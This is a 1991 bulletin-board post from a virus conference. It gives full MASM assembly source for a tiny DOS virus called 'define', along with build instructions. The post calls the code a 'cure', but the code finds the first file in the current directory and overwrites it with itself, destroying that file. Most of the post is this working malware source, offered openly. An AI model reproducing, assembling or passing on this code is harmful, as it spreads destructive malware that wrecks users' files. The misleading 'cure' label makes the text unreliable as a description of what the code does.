;=========================================================================== ;Date: 05-24-91 (0:06) Number: 6288 THE APEX BBS ;From: Mike Hathorn Refer#: NONE ;To: All Recvd: NO ;Subj: define Conf: (54) Virus ;--------------------------------------------------------------------------- ;Gentlemen, ;The following assembly source code is the cure for the define ;virus. Define, because it is my belief that by the definition ;of a virus, no stable virus can be written smaller than define. ; Code compiled under MASM ver 4.00 ; Use DOS EXE2BIN to convert to .COM file ; Code assumes SI=100h, AX=00h ; (c) 1991 Mithrandir TITLE DEFINE CODE SEGMENT ASSUME CS : CODE ORG 100h VIRUS_CURE: XCHG CX,AX ;exchange register values and setup search ;for normal files MOV AH,4Eh ;setup search for first match MOV DX,OFFSET File ;point to search criteria INT 21h ;search for any normal file MOV AX,3D01h ;setup open file with write access MOV DX,09Eh ;point to file ASCIIZ spec INT 21h ;open file XCHG BX,AX MOV AH,40h ;setup write to file MOV DX,SI ;write this code MOV CX,SI ;this many bytes INT 21h ;write it RET File: DB '*.*',0 CODE ENDS END VIRUS_CURE ;Mithrandir ;--- Opus-CBCS 1.14 ;* Origin: The Mad Dog Opus (5:7104/3.0)